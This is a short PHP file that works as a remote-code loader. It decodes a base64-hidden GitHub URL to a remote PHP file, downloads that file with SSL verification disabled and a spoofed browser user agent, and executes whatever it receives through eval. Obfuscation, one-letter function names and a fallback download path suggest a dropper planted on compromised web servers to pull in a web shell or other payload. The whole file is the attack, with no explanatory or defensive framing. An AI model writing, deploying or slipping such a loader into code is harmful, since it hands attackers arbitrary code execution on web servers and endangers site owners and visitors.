<?php
$u = base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2x1ZmZ5b3BtL29wbS9yZWZzL2hlYWRzL21haW4vMi5waHA=");

function d($x) {
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, $x);
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($h, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($h, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($h, CURLOPT_TIMEOUT, 10);
    curl_setopt($h, CURLOPT_USERAGENT, 'Mozilla/5.0');
    $r = curl_exec($h);
    curl_close($h);
    return $r;
}

function f($x) {
    $o = [
        "ssl" => [
            "verify_peer" => false,
            "verify_peer_name" => false,
        ],
        "http" => [
            "header" => "User-Agent: Mozilla/5.0\r\n",
            "timeout" => 10
        ]
    ];
    $z = stream_context_create($o);
    return file_get_contents($x, false, $z);
}

function j($c) {
    ob_start();
    eval("?>" . $c);

}

try {
if (function_exists('curl_init')) {
$k = d($u);
} else {
$k = f($u);
}
echo j($k);
} catch (Exception $e) {
echo "Terjadi kesalahan";
}
?>
